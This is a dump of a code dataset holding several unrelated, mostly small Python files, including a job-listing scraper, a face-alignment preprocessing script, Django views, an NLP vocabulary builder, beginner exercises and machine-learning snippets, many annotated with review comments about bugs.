text stringlengths 8 6.05M |
|---|
from string import split
from urllib import urlopen, quote
from BeautifulSoup import BeautifulSoup, NavigableString
from datetime import datetime, date
import scraperwiki
# Record when this scrape started so every saved row carries the same stamp.
data = scraperwiki.sqlite.select('datetime()')
startedAt = data [ 0 ] [ 'datetime()' ]
# Rebuild the output table from scratch on every run.
scraperwiki.sqlite.execute("drop table if exists swdata")
scraperwiki.sqlite.commit()
# Indeed.ca search URL; the literal 'counsellor' is replaced below with each
# search term ("title%3A%28...%29" is the URL-encoded "title:(...)" filter).
URL_template = 'http://www.indeed.ca/jobs?q=title%3A%28counsellor%29&l=&radius=50&fromage=15'
# One job-title search term per line.
titles = '''\
career consultant
career counsellor
career counselor
career coach
career development
career group
career resource
employment consultant
employment counsellor
employment counselor
employment rehabilitation
employment services
employment specialist
intake coordinator
job coach
job developer
job finding
job skills
language training
outplacement consultant
vocational program
vocational rehabilitation
vocational support'''
# Canadian province/territory abbreviations used to validate parsed locations.
shortNames = [ 'NS', 'NB', 'NL', 'QC', 'BC', 'AB', 'SK', 'MB', 'ON', 'PE', 'YT', 'NU', 'NT', ]
titles = [ title . strip ( ) for title in split ( titles, '\n' ) ];
def getInnerText(item):
    """Recursively concatenate the text content of a BeautifulSoup 3 node.

    :param item: a NavigableString or Tag.
    :return: the node's text, with a leading space before each child fragment.
    """
    if isinstance(item, NavigableString):
        return unicode(item)
    result = ''
    # Nodes without .contents (e.g. None returned by a failed find) simply
    # yield an empty string; the original's bare `except: pass` swallowed
    # *every* error, including real bugs inside the recursion.
    for content in getattr(item, 'contents', []):
        result += ' %s' % getInnerText(content)
    return result
# Main scrape: run one Indeed search per job title and follow "Next" pages.
# (Indentation was reconstructed; the snippet arrived flattened.)
for title in titles :
    URL = URL_template . replace ( 'counsellor', quote ( title ) )
    while URL :
        print URL
        HTML = urlopen ( URL ) . read ( )
        # Empty result page: abandon this search term.
        if HTML . find ( 'did not match any jobs' ) != -1 : break
        soup = BeautifulSoup ( HTML )
        jobTitles = soup . findAll ( 'h2', { 'class': 'jobtitle' } )
        for jobTitle in jobTitles :
            # BeautifulSoup 3 exposes attrs as (name, value) pairs.
            for attr in jobTitle . find ( 'a' ) . attrs :
                if attr [ 0 ] == 'href' :
                    link = attr [ 1 ]
                elif attr [ 0 ] == 'title' :
                    theJobTitle = attr [ 1 ] . strip ( )
            # Store the link as a ready-made HTML anchor.
            link = '<a href="http://www.indeed.com%s">%s</a>' % ( link, theJobTitle, )
            employer = getInnerText ( jobTitle . findNext ( 'span', { 'class': 'company' } ) )
            location = getInnerText ( jobTitle . findNext ( 'span', { 'class': 'location' } ) )
            # Locations end with a 2-letter province code, e.g. "Toronto, ON".
            jurisdiction = location [ -2 : ]
            community = location [ : -4 ] . strip ( )
            # NOTE(review): `break` skips the *rest of the page* on the first
            # non-Canadian listing -- confirm `continue` was not intended.
            if not jurisdiction in shortNames :
                break
            record = {
                'salary': '',
                'jobTitle': theJobTitle,
                'jurisdiction': jurisdiction,
                'community': community,
                'employer': employer,
                'source': 'IN',
                'link': link,
                'startedAt': startedAt,
                'conditions': '',
                'deadline': '',
                'dateposted': '',
            }
            # Upsert keyed on the link so re-runs do not duplicate rows.
            scraperwiki.sqlite.save ( [ 'link' ], record )
        # Look for a "Next" pager link; stay in the while-loop if found.
        URL = ''
        possibleNexts = soup . findAll ( 'span', { 'class': 'np' } )
        breakLoop = possibleNexts == [ ]
        for possibleNext in possibleNexts :
            breakLoop = getInnerText ( possibleNext ) . find ( 'Next' ) == -1
            if not breakLoop :
                nextLink = possibleNext . findParent ( 'a' )
                for attr in nextLink . attrs :
                    if attr [ 0 ] == 'href' :
                        URL = 'http://www.indeed.com%s' % attr [ 1 ]
                        found = True
                        break
        if breakLoop :
            break
|
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
class SpinnerBox(BoxLayout):
    """Root widget; its layout/children are declared in the matching kv file.

    The original defined an __init__ that only forwarded to super() --
    pure boilerplate with no behavioural effect, so it was removed.
    """
    pass
class SpinnerApp(App):
    """Kivy application whose root widget is a SpinnerBox."""

    def build(self):
        """Create and return the root widget."""
        root = SpinnerBox()
        return root
# Run the app only when executed as a script, not when imported.
if __name__ == '__main__':
    SpinnerApp().run()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018 Phonexia
# Author: Jan Profant <jan.profant@phonexia.com>
# All Rights Reserved
import argparse
import pickle
import random
import logging
import os
import cv2
import openface
# Root logger at INFO so per-person progress messages below are visible.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def show_image(image):
    """Display *image* in a resizable debug window; press space to close it.

    :param image: BGR image array as returned by cv2.imread.
    """
    # The original printed the undefined name `person` (NameError) and
    # re-imported cv2 locally although it is imported at module level.
    cv2.namedWindow('image', cv2.WINDOW_NORMAL)
    cv2.imshow('image', image)
    # waitKey returns an int key code; 32 is the spacebar. The original
    # compared against the *string* '32', which could never match, so the
    # window was never destroyed.
    if cv2.waitKey(0) == 32:
        cv2.destroyAllWindows()
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--input-dir', required=True,
                        help='path to the input directory in format Person1/image1.jpg, Person4/image3.jpg')
    parser.add_argument('--face-predictor', help='path to dlib face predictor', required=False,
                        default=os.path.join('..', 'openface', 'models', 'dlib',
                                             'shape_predictor_68_face_landmarks.dat'))
    # NOTE(review): no type=int, so a CLI-supplied value stays a string;
    # the default 96 is an int -- confirm openface accepts both.
    parser.add_argument('--img-dim', required=False, default=96)
    args = parser.parse_args()
    # Each subdirectory of input_dir is one person.
    persons = os.listdir(args.input_dir)
    random.shuffle(persons)
    num_classes = len(persons)
    align = openface.AlignDlib(args.face_predictor)
    logger.info('Found {} persons in input directory `{}`.'.format(num_classes, args.input_dir))
    for person in persons:
        person_dir = os.path.join(args.input_dir, person)
        pickle_file_path = os.path.join(args.input_dir, '{}.pkl'.format(person))
        # Skip persons already processed (their .pkl exists) and stray files.
        if not os.path.exists(pickle_file_path) and os.path.isdir(person_dir):
            aligned_examples = []
            for input_image in os.listdir(os.path.join(args.input_dir, person)):
                input_image = os.path.join(args.input_dir, person, input_image)
                image = cv2.imread(input_image)
                # show_image(image)
                bbs = align.getAllFaceBoundingBoxes(image)
                if len(bbs) != 1:
                    logger.warning('Detected {} faces in image `{}`, expecting only 1.'.format(len(bbs), input_image))
                    # NOTE(review): presumably align() re-detects when given a
                    # None bounding box -- confirm against openface docs.
                    boundary_box = None
                else:
                    boundary_box = bbs[0]
                aligned_face = align.align(args.img_dim, image, boundary_box,
                                           landmarkIndices=openface.AlignDlib.OUTER_EYES_AND_NOSE)
                if aligned_face is None:
                    logger.warning('Failed to align face in file `{}`.'.format(input_image))
                    continue
                # show_image(aligned_face)
                aligned_examples.append((aligned_face, person))
            # Persist every aligned face of this person in one pickle.
            with open(pickle_file_path, 'wb') as f:
                pickle.dump(aligned_examples, f, pickle.HIGHEST_PROTOCOL)
|
# Interactive Fibonacci: with a = b = 1, after the loop below `a` holds the
# n-th Fibonacci number (1, 1, 2, 3, 5, ...).
n = int(input("Digite um número inteiro para saber seu correspondente na seqüencia de Fibonacci: "))
a = 1
b = 1
count = 1
# Re-prompt until the user supplies a positive integer.
while n <= 0:
    print('Não é possível utilizar um valor negativo.')
    n = int(input('Digite um número inteiro para saber seu correspondente na sequüencia de Fibonacci: '))
# Advance the pair (a, b) n-1 times; a ends up at Fibonacci(n).
while count <= (n - 1):
    a, b = b, a + b
    count += 1
print(a)
# Print the 1-through-10 multiplication table for a user-supplied number.
num = int(input('Digite um número para ver sua tabuada: '))
# The original template repeated "X 1" on the last two lines even though the
# interpolated values were num*9 and num*10; the labels now match the values.
print("""{} X 1 = {}
{} X 2 = {}
{} X 3 = {}
{} X 4 = {}
{} X 5 = {}
{} X 6 = {}
{} X 7 = {}
{} X 8 = {}
{} X 9 = {}
{} X 10 = {}""".format(num, num * 1, num, num * 2, num, num * 3, num, num * 4, num, num * 5, num, num * 6, num, num * 7, num, num * 8, num, num * 9, num, num * 10))
|
#!/usr/bin/python3
def uniq_add(my_list=[]):
    """Return the sum of the *unique* elements of my_list.

    Duplicates count once; an empty (or omitted) list sums to 0. The shared
    mutable default is harmless here because the argument is never mutated.
    """
    # set() both deduplicates and lets sum() iterate at C speed; the original
    # built a dict via dict.fromkeys and accumulated in a manual loop.
    return sum(set(my_list))
|
## gfal 2.0 tools core parameters
## @author Adrien Devresse <adevress@cern.ch> CERN
## @license GPLv3
##
import sys
import gfal2
# Error message raised when a CLI parameter value cannot be interpreted.
# The original assigned parameter_type_error twice in a row; the first value
# ("not a valid parameter type") was dead code and has been removed.
parameter_type_error = "impossible to set parameter properly..."
def get_parameter_from_str_list(str_value_list):
    """Split a comma-separated string and convert each piece to a typed value."""
    pieces = str_value_list.split(",")
    return [get_parameter_from_str(piece) for piece in pieces]
def get_parameter_from_str(str_value):
    """Convert *str_value* to an int, bool or str, trying in that order."""

    def str2bool(v):
        lowered = v.lower()
        if lowered in ("true", "yes", "y", "1"):
            return True
        if lowered in ("false", "no", "n", "0"):
            return False
        raise ValueError("is not a boolean")

    # int wins over bool so "1" parses as the integer 1, and str is the
    # catch-all that never fails.
    for converter in (int, str2bool, str):
        try:
            return converter(str_value)
        except ValueError:
            continue
    raise ValueError(parameter_type_error)
def parse_parameter(str_params):
    """Parse a "group:key=v1,v2,..." definition into (group, key, values)."""
    colon = str_params.index(":")
    group = str_params[:colon]
    # First '=' *after* the colon separates the key from its value list.
    equals = str_params.index("=", colon + 1)
    key = str_params[colon + 1:equals]
    values = get_parameter_from_str_list(str_params[equals + 1:])
    return (group, key, values)
def set_gfal_tool_parameter(context, param_struct):
    # Apply one parsed (group, key, values) tuple to a gfal2 context,
    # dispatching on the Python type of the first value.
    def set_params_struct(p, f):
        # NOTE(review): the `p` argument is ignored -- the closure reads
        # param_struct directly, and only the first value is passed to f.
        f(param_struct[0], param_struct[1], param_struct[2][0])
    # More than one value: always stored as a string list.
    if( len(param_struct[2]) > 1):
        context.set_opt_string_list(param_struct[0], param_struct[1], param_struct[2])
    elif( int == type(param_struct[2][0]) ):
        set_params_struct(param_struct, context.set_opt_integer)
    elif( bool ==type(param_struct[2][0]) ):
        set_params_struct(param_struct, context.set_opt_boolean)
    elif( str== type(param_struct[2][0]) ):
        set_params_struct(param_struct, context.set_opt_string)
    else:
        raise ValueError(parameter_type_error)
def applys_option(context, params):
    """Parse every --definition CLI entry and apply it to the gfal2 context.

    :param context: gfal2 context object receiving the options.
    :param params: parsed CLI namespace; params.definition is a list of
        one-element sequences like ["group:key=value1,value2"].
    """
    if params.definition:
        parsed = [parse_parameter(entry[0]) for entry in params.definition]
        # Plain loop instead of the original list comprehension that was
        # built purely for its side effects and thrown away.
        for triple in parsed:
            set_gfal_tool_parameter(context, triple)
|
import math
import random
def line(X, a, b):
    """Evaluate the affine map a*x + b for every x in X, returning a list."""
    values = []
    for x in X:
        values.append(a * x + b)
    return values
def sse(Y, Y_pred):
    """Sum of squared errors between paired elements of Y and Y_pred."""
    total = 0
    for actual, predicted in zip(Y, Y_pred):
        total += (actual - predicted) ** 2
    return total
def loss(Y, a, b, X):
    """SSE of the line (a, b) evaluated on X against the targets Y."""
    predictions = line(X, a, b)
    return sse(Y, predictions)
def avg_loss(Y, a, b, X):
    """Root-mean-square error of the line (a, b) on the data (X, Y)."""
    mean_squared = loss(Y, a, b, X) / len(X)
    return math.sqrt(mean_squared)
def average(X):
    """Arithmetic mean of X (X must be non-empty)."""
    total = sum(X)
    return total / len(X)
def update(Y, a, b, X, learning_rate):
    """Perform one gradient-descent step on the SSE loss.

    Returns the updated (a, b) pair; the inputs are not mutated.
    """
    predictions = line(X, a, b)
    # d(loss)/db for each sample; d(loss)/da is the same scaled by x.
    grad_b = [2 * (p - y) for p, y in zip(predictions, Y)]
    grad_a = [x * g for x, g in zip(X, grad_b)]
    new_a = a - learning_rate * average(grad_a)
    new_b = b - learning_rate * average(grad_b)
    return new_a, new_b
if __name__ == '__main__':
    # Fit y = a*x + b by gradient descent on synthetic, noise-free data.
    n_samples = 30
    a, b = 2, 2
    learning_rate = 0.1
    X = [random.random() for _ in range(n_samples)]
    Y = line(X, a, b)
    print(X)
    print(Y)
    a_guess, b_guess = -1., 1.
    # NOTE(review): %d truncates the float guesses; %.2f would print them exactly.
    print('initial values: a = %d, b = %d' % (a_guess, b_guess))
    for i in range(400):
        a_guess, b_guess = update(Y, a_guess, b_guess, X, learning_rate)
        print('step %d : a_guess = %.2f, b_guess = %.2f. Average loss : %.2f' % (i, a_guess, b_guess, avg_loss(Y, a_guess, b_guess, X)))
    print(avg_loss(Y, a_guess, b_guess, X))
|
from django.shortcuts import render,redirect
from django.contrib.auth.models import User, auth
from django.contrib import messages
from .forms import UserRegistrationForm,UserUpdateForm,ProfileUpdateForm
from .models import Book
# Create your views here.
def register(request):
    """Sign-up view: create the account on a valid POST, else show the form.

    On success the user gets a flash message and is redirected to login;
    on an invalid POST the bound form (with errors) is re-rendered.
    """
    if request.method == 'POST':
        form=UserRegistrationForm(request.POST)
        if form.is_valid():
            form.save()
            username=form.cleaned_data.get('username')
            messages.success(request, f'Your Account Has Been Created!! You Can Log In Now!! as {username}')
            return redirect("login")
    else:
        # GET: show a blank registration form.
        form=UserRegistrationForm()
    return render(request,'register.html',{'form': form})
def profile(request):
    """Show and process the profile-edit page.

    On POST, validates both the user form and the profile form (the latter
    also receives request.FILES for the avatar upload); when both are valid
    they are saved and the user is redirected back here. On GET (or an
    invalid POST) the forms are rendered.
    """
    if request.method == 'POST':
        u_form = UserUpdateForm(request.POST, instance=request.user)
        p_form = ProfileUpdateForm(request.POST,
                                   request.FILES,
                                   instance=request.user.profile)
        if u_form.is_valid() and p_form.is_valid():
            u_form.save()
            p_form.save()
            # Fixed typo in the flash message ("UPDAED" -> "UPDATED") and
            # dropped the pointless f-prefix on a placeholder-free string.
            messages.success(request, 'Your Account Has Been UPDATED!!')
            return redirect('profile')
    else:
        u_form = UserUpdateForm(instance=request.user)
        p_form = ProfileUpdateForm(instance=request.user.profile)
    context = {
        'u_form': u_form,
        'p_form': p_form
    }
    return render(request, 'profile.html', context)
def ecopies(request):
    """Render the e-copies page listing every Book in the database."""
    all_books = Book.objects.all()
    return render(request, "e-copies.html", {'books': all_books})
|
from nltk import tokenize
import json
import itertools
from tensorflow.python.platform import gfile
import re
# NOTE(review): Choose_config is referenced but never imported in this file,
# so this line raises NameError as written -- confirm the intended import
# (e.g. `import Choose_config`) against the rest of the project.
config = Choose_config.current_config['class']
# Special vocabulary symbols
_PAD = config._PAD
_GO = config._GO
_EOS = config._EOS
_UNK = config._UNK
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
# Integer ids reserved for the special symbols above.
PAD_ID = config.PAD_ID
GO_ID = config.GO_ID
EOS_ID = config.EOS_ID
UNK_ID = config.UNK_ID
# Regular expressions used to tokenize (note: *bytes* patterns, so the
# helpers below expect bytes input).
_WORD_SPLIT = re.compile(b"([.,!?\"':;)(])")
_DIGIT_RE = re.compile(br"\d")
def load_article(raw_path, early_stop, batch_size):
    '''Yield batches of sentence-tokenized articles from a JSON-lines file.

    :param raw_path: file with one JSON object per line, each having
        'title' and 'content' keys.
    :param early_stop: if truthy, stop after roughly this many articles.
    :param batch_size: number of lines grouped into each yielded batch.
    :return: yields dicts {'title': [...], 'content': [...]}.
    '''
    # itertools.izip_longest exists only on Python 2; fall back to the
    # Python 3 name so the generator works on either interpreter.
    try:
        zip_longest = itertools.izip_longest
    except AttributeError:
        zip_longest = itertools.zip_longest

    def _tokenize(batch):
        # Re-join each article's sentences with single spaces.
        return {'title': [" ".join(tokenize.sent_tokenize(c)) for c in batch['title']],
                'content': [" ".join(tokenize.sent_tokenize(c)) for c in batch['content']]}

    # Whether the early-stop countdown is active (decided once, up front,
    # exactly like the original's if/else duplication did).
    limited = bool(early_stop)
    # The original also opened raw_path into an unused, never-closed handle
    # here; that resource leak has been removed, and the real read below now
    # uses a context manager.
    with open(raw_path) as f:
        for next_n_lines in zip_longest(*[f] * batch_size):
            articles = {"title": [], "content": []}
            for line in next_n_lines:
                if line:
                    json_data = json.loads(line.strip())
                    articles["title"].append(json_data['title'])
                    articles["content"].append(json_data['content'])
                    if limited:
                        early_stop -= 1
                        if early_stop <= 0:
                            break
            yield _tokenize(articles)
            if limited and early_stop <= 0:
                break
def basic_tokenizer(sentence):
    """Very basic tokenizer: split the sentence into a list of tokens."""
    # NOTE(review): _WORD_SPLIT is a *bytes* pattern, so under Python 3 this
    # function requires `sentence` to be bytes (it was written for Python 2
    # str) -- confirm what the callers pass.
    words = []
    for space_separated_fragment in sentence.strip().split():
        words.extend(re.split(_WORD_SPLIT, space_separated_fragment))
    # Drop the empty strings re.split leaves between adjacent delimiters.
    return [w for w in words if w]
# Modified
def create_vocabulary(vocabulary_path, train_gen, val_gen, max_vocabulary_size,
                      tokenizer=None, normalize_digits=True):
    """Create vocabulary file (if it does not exist yet) from article batches.

    Each batch from train_gen / val_gen is a dict with 'title' and 'content'
    lists of sentences. Every line is tokenized and digits are normalized
    (if normalize_digits is set). The vocabulary keeps the most-frequent
    tokens up to max_vocabulary_size, written one token per line so the
    first line gets id=0, the second id=1, and so on.

    Args:
      vocabulary_path: path where the vocabulary will be created.
      train_gen: generator of training article batches.
      val_gen: generator of validation article batches.
      max_vocabulary_size: limit on the size of the created vocabulary.
      tokenizer: a function to tokenize each sentence; if None,
        basic_tokenizer will be used.
      normalize_digits: Boolean; if true, all digits are replaced by 0s.
    """
    if not gfile.Exists(vocabulary_path):
        # The original interpolated the undefined name `data_path` here,
        # raising NameError before any work was done.
        print("Creating vocabulary %s" % vocabulary_path)
        vocab = {}

        def _count_tokens(gen, counter):
            # Tally token frequencies into `vocab`; returns the running
            # line counter so progress messages continue across generators.
            for article_batch in gen:
                for line in article_batch['title'] + article_batch['content']:
                    counter += 1
                    if counter % 100000 == 0:
                        print("  processing line %d" % counter)
                    tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)
                    for w in tokens:
                        word = re.sub(_DIGIT_RE, b"0", w) if normalize_digits else w
                        vocab[word] = vocab.get(word, 0) + 1
            return counter

        # The original duplicated this whole loop for train and validation.
        counter = _count_tokens(train_gen, 0)
        _count_tokens(val_gen, counter)
        # Reserved symbols first, then tokens by descending frequency.
        vocab_list = _START_VOCAB + sorted(vocab, key=vocab.get, reverse=True)
        if len(vocab_list) > max_vocabulary_size:
            vocab_list = vocab_list[:max_vocabulary_size]
        with gfile.GFile(vocabulary_path, mode="wb") as vocab_file:
            for w in vocab_list:
                vocab_file.write(w + b"\n")
def initialize_vocabulary(vocabulary_path):
    """Initialize vocabulary from file.

    We assume the vocabulary is stored one-item-per-line, so a file:
      dog
      cat
    will result in a vocabulary {"dog": 0, "cat": 1}, and this function will
    also return the reversed-vocabulary ["dog", "cat"].

    Args:
      vocabulary_path: path to the file containing the vocabulary.
    Returns:
      a pair: the vocabulary (a dictionary mapping string to integers), and
      the reversed vocabulary (a list, which reverses the vocabulary mapping).
    Raises:
      ValueError: if the provided vocabulary_path does not exist.
    """
    # Guard clause first; the original built the error with a stray comma
    # ("... %s not found.", path) so the path was never interpolated.
    if not gfile.Exists(vocabulary_path):
        raise ValueError("Vocabulary file %s not found." % vocabulary_path)
    rev_vocab = []
    with gfile.GFile(vocabulary_path, mode="rb") as f:
        rev_vocab.extend(f.readlines())
    rev_vocab = [line.strip() for line in rev_vocab]
    # Token -> id, where id is the token's line number.
    vocab = dict((x, y) for (y, x) in enumerate(rev_vocab))
    return vocab, rev_vocab
def data_to_token_ids(gen, target_path, vocabulary_path,
                      tokenizer=None, normalize_digits=True):
    """Tokenize article batches and save token-ids using the given vocabulary.

    Loads batches from `gen`, converts every title/content line with
    sentence_to_token_ids, and writes the ids (space-separated, one line per
    sentence) to target_path.

    Args:
      gen: generator of article batches ({'title': [...], 'content': [...]}).
      target_path: path where the file with token-ids will be created.
      vocabulary_path: path to the vocabulary file.
      tokenizer: a function to tokenize each sentence; if None,
        basic_tokenizer will be used.
      normalize_digits: Boolean; if true, all digits are replaced by 0s.
    """
    if not gfile.Exists(target_path):
        print("Tokenizing data")
        vocab, _ = initialize_vocabulary(vocabulary_path)
        counter = 0
        # Open the output file ONCE. The original re-opened target_path in
        # "w" mode inside the batch loop, truncating everything written for
        # all previous batches -- only the last batch survived.
        with gfile.GFile(target_path, mode="w") as tokens_file:
            for article_batch in gen:
                for line in article_batch['title'] + article_batch['content']:
                    counter += 1
                    if counter % 100000 == 0:
                        print("  tokenizing line %d" % counter)
                    token_ids = sentence_to_token_ids(line, vocab, tokenizer,
                                                      normalize_digits)
                    tokens_file.write(" ".join(str(tok) for tok in token_ids) + "\n")
def prepare_wmt_data(data_dir, en_vocabulary_size, fr_vocabulary_size, tokenizer=None):
    """Get WMT data into data_dir, create vocabularies and tokenize data.

    Args:
      data_dir: directory in which the data sets will be stored.
      en_vocabulary_size: size of the English vocabulary to create and use.
      fr_vocabulary_size: size of the French vocabulary to create and use.
      tokenizer: a function to use to tokenize each data sentence;
        if None, basic_tokenizer will be used.
    Returns:
      A tuple of 6 elements:
        (1) path to the token-ids for English training data-set,
        (2) path to the token-ids for French training data-set,
        (3) path to the token-ids for English development data-set,
        (4) path to the token-ids for French development data-set,
        (5) path to the English vocabulary file,
        (6) path to the French vocabulary file.
    """
    # NOTE(review): this function appears copied from the TF translate
    # tutorial and is broken in this module: get_wmt_enfr_train_set,
    # get_wmt_enfr_dev_set and `os` are not defined/imported here, and the
    # create_vocabulary/data_to_token_ids signatures above now take
    # generators, not file paths. Confirm whether it should be removed
    # or ported before calling it.
    # Get wmt data to the specified directory.
    train_path = get_wmt_enfr_train_set(data_dir)
    dev_path = get_wmt_enfr_dev_set(data_dir)
    # Create vocabularies of the appropriate sizes.
    fr_vocab_path = os.path.join(data_dir, "vocab%d.fr" % fr_vocabulary_size)
    en_vocab_path = os.path.join(data_dir, "vocab%d.en" % en_vocabulary_size)
    create_vocabulary(fr_vocab_path, train_path + ".fr", fr_vocabulary_size, tokenizer)
    create_vocabulary(en_vocab_path, train_path + ".en", en_vocabulary_size, tokenizer)
    # Create token ids for the training data.
    fr_train_ids_path = train_path + (".ids%d.fr" % fr_vocabulary_size)
    en_train_ids_path = train_path + (".ids%d.en" % en_vocabulary_size)
    data_to_token_ids(train_path + ".fr", fr_train_ids_path, fr_vocab_path, tokenizer)
    data_to_token_ids(train_path + ".en", en_train_ids_path, en_vocab_path, tokenizer)
    # Create token ids for the development data.
    fr_dev_ids_path = dev_path + (".ids%d.fr" % fr_vocabulary_size)
    en_dev_ids_path = dev_path + (".ids%d.en" % en_vocabulary_size)
    data_to_token_ids(dev_path + ".fr", fr_dev_ids_path, fr_vocab_path, tokenizer)
    data_to_token_ids(dev_path + ".en", en_dev_ids_path, en_vocab_path, tokenizer)
    return (en_train_ids_path, fr_train_ids_path,
            en_dev_ids_path, fr_dev_ids_path,
            en_vocab_path, fr_vocab_path)
import os
# Base directory location
# NOTE(review): BASE_DIR is the *current working directory*, not this file's
# directory, and the relative paths below do not actually use it -- they
# resolve against the CWD at runtime; confirm that is intended.
BASE_DIR = os.getcwd()
# File locations (relative to the working directory)
MEAL_LOC = os.path.join("data", "meals.csv")
ITEM_LOC = os.path.join("data", "cupboard.csv")
PRICE_LOC = os.path.join("data", "prices.csv")
DATA_LOC = os.path.join("data", "data.txt")
import random

# Valid moves, and what each move defeats. A lookup table replaces the
# original's six near-identical elif branches.
CHOICES = ["stone", "paper", "scissor"]
BEATS = {"stone": "scissor", "paper": "stone", "scissor": "paper"}

chances = 5
no_of_chances = 0
computer_score = 0
player_score = 0
print(" WELCOME TO STONE : PAPER : SCISSOR")
print(" CHOOSE ANY \tStone \tPaper \tscissor")
# STARTING OF WHILE LOOP
while no_of_chances < chances:
    player_inp = input(" Stone : Paper : Scissor").strip().lower()
    # Reject typos instead of scoring them: the original's final `else`
    # branch silently awarded the player a point for ANY invalid input.
    if player_inp not in CHOICES:
        print(" INVALID CHOICE, PLEASE TYPE stone, paper OR scissor")
        continue
    comp_inp = random.choice(CHOICES)
    print(f"YOUR GUESS IS : {player_inp} AND COMPUTER GUESS IS :{comp_inp}")
    if player_inp == comp_inp:
        print(" 0 : POINTS ASSIGNED TO EACH ")
    elif BEATS[player_inp] == comp_inp:
        print("PLAYER WINS 1 POINT")
        player_score += 1
    else:
        print(" COMPUTER WINS 1 POINT")
        computer_score += 1
    print(f"COMPUTER POINT IS : {computer_score} AND YOUR POINT IS : {player_score}")
    no_of_chances += 1
    print(f" CHANCE LEFT : {chances-no_of_chances}")
# END OF WHILE LOOP
print(" ----------------- GAME OVER -----------------")
if player_score > computer_score:
    print(f"PLAYER WON ! POINTS : {player_score} , DIFFERENCE IN POINTS : {player_score-computer_score}")
elif computer_score > player_score:
    print(f"COMPUTER WON! POINTS : {computer_score} , DIFFERENCE IN POINTS : {computer_score-player_score}")
else:
    print(f"MATCH DRAW COMPUTER SCORE : {computer_score}, PLAYER SCORE : {player_score}")
|
# -*- coding: utf-8 -*-
# Package metadata consumed by the theme's packaging/setup machinery.
__version__ = '0.1.1.dev'
__description__ = 'A Semantic UI theme for devpi'
|
# from zutils.utils import *
#
# if __name__ == '__main__':
# import numpy as np
# c1 = TaskRedis()
# c2 = TaskRedis('task2')
# s1 = TaskRedis()
# s2 = TaskRedis('task2')
#
# c1.set_task({'a': 1, 'b': np.zeros([1,1])})
# c2.set_task({'a': 1, 'b': np.zeros([2,2])})
#
#
# task = s2.get_task()
# task['c'] = task['b'].shape[0] * task['b'].shape[1]
# s2.set_task_result(task)
#
# task = s1.get_task()
# task['c'] = task['b'].shape[0] * task['b'].shape[1]
# s1.set_task_result(task)
#
#
#
#
#
# print(c1.get_task_result())
# print(c2.get_task_result())
|
# coding=utf-8
"""
题目一:和为s的两个数字
输入一个递增排序的数组和一个数字s,在数组中查找两个数,使得它们的和正好是s。如果有多对数字的数组的和等于s,输出任意一对
"""
class Solution(object):
    """Two-sum on an ascending sorted array (problem 1)."""

    def find_numbers_with_sum(self, nums, target):
        """Return one pair [x, y] from nums with x + y == target, or []."""
        lo, hi = 0, len(nums) - 1
        # Two-pointer scan: moving `hi` left decreases the sum, moving
        # `lo` right increases it, so every pair is examined implicitly.
        while lo < hi:
            pair_sum = nums[lo] + nums[hi]
            if pair_sum == target:
                return [nums[lo], nums[hi]]
            if pair_sum > target:
                hi -= 1
            else:
                lo += 1
        return []
"""
题目二:和为s的连续正数序列
"""
class Solution(object):
    """Runs of consecutive positive integers summing to a target (problem 2).

    NOTE: this intentionally re-uses the name Solution, shadowing the
    two-sum class above, exactly as the original file did.
    """

    def find_continuous_sequence(self, target):
        """Return [[begin, end], ...] for every consecutive run that sums
        to target (needs target >= 3); returns None for smaller targets."""
        if target < 3:
            return
        begin, end = 1, 2
        # Any valid run must start below the midpoint of 1..target.
        middle = (1 + target) / 2
        current_sum = begin + end
        sequences = []
        while begin < middle:
            if current_sum == target:
                sequences.append([begin, end])
            if current_sum <= target:
                # Grow the window rightwards (after recording a hit, too).
                end += 1
                current_sum += end
            else:
                # Shrink from the left until we are back at or under target.
                while begin < middle and current_sum > target:
                    current_sum -= begin
                    begin += 1
        return sequences
# Parenthesized call form works under both Python 2 and Python 3; the
# original Python 2 print *statement* is a SyntaxError on Python 3.
print(Solution().find_continuous_sequence(15))
|
# -*- coding: utf-8 -*-
from django.conf.urls import url, include, patterns
from rest_framework import routers
from app.api.v1.fleet.views import FleetView
from app.api.v1.customer.views import CustomerView
from app.api.v1.rentacar.views import RentACarView
from app.api.v1.rentacar.views import RentACarGiveBack
from app.api.v1.rentacar.views import RentACarRetrieveSerializer
# DRF router exposing list/create endpoints without trailing slashes.
# NOTE(review): `base_name` was renamed `basename` in DRF 3.9+, and
# `django.conf.urls.patterns` was removed in Django 1.10 -- this module
# pins the project to older versions; confirm before upgrading.
router = routers.DefaultRouter(trailing_slash=False)
router.register(r'/frota', FleetView, base_name="fleet")
router.register(r'/cliente', CustomerView, base_name="customer")
router.register(r'/alugueis', RentACarRetrieveSerializer, base_name='rentacar')
router.register(r'/alugar', RentACarView, base_name="rentacar-create")
router.register(r'/devolver', RentACarGiveBack, base_name="rentacar-update")
# Detail routes bound explicitly so update/partial_update/destroy get
# pk-based URLs alongside the router-generated collection routes.
fleet_detail = FleetView.as_view({
    'put': 'update',
    'patch': 'partial_update',
    'delete': 'destroy'
})
customer_detail = CustomerView.as_view({
    'put': 'update',
    'patch': 'partial_update',
    'delete': 'destroy'
})
rentacar_detail = RentACarGiveBack.as_view({
    'put': 'update',
})
urlpatterns = patterns('',
    url(r'^/frota/(?P<pk>[0-9]+)/$', fleet_detail, name='fleet-detail'),
    url(r'^/cliente/(?P<pk>[0-9]+)/$', customer_detail, name='customer-detail'),
    url(r'^/aluguel/(?P<pk>[0-9]+)/$', rentacar_detail, name='rentacar-detail'),
)
urlpatterns += router.urls
|
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 5 17:38:13 2021
@author: anand
"""
# Importing necessary libraries
import numpy as np
import pandas as pd
from sklearn import svm
import matplotlib.pyplot as plt
import seaborn as sns; sns.set(font_scale = 1.2)
import quantstats as qs
# Importing the data
dataset = pd.read_csv('cars.csv')
data = dataset.copy(deep=True)
# Checking for missing data
missing = dataset.isnull().sum()
## No missing values are found
# Take every column except the brand column and coerce it to numeric.
# (The original also did `X = dataset[:-1]`, which drops the last *row*,
# not the brand column; that dead assignment has been removed.)
X = data[data.columns[:-1]]
X = X.apply(pd.to_numeric, errors='coerce').fillna(0).astype(int)
summary_X = X.describe()
# Using the Elbow method to find the optimal number of clusters
from sklearn.cluster import KMeans
wcss = []
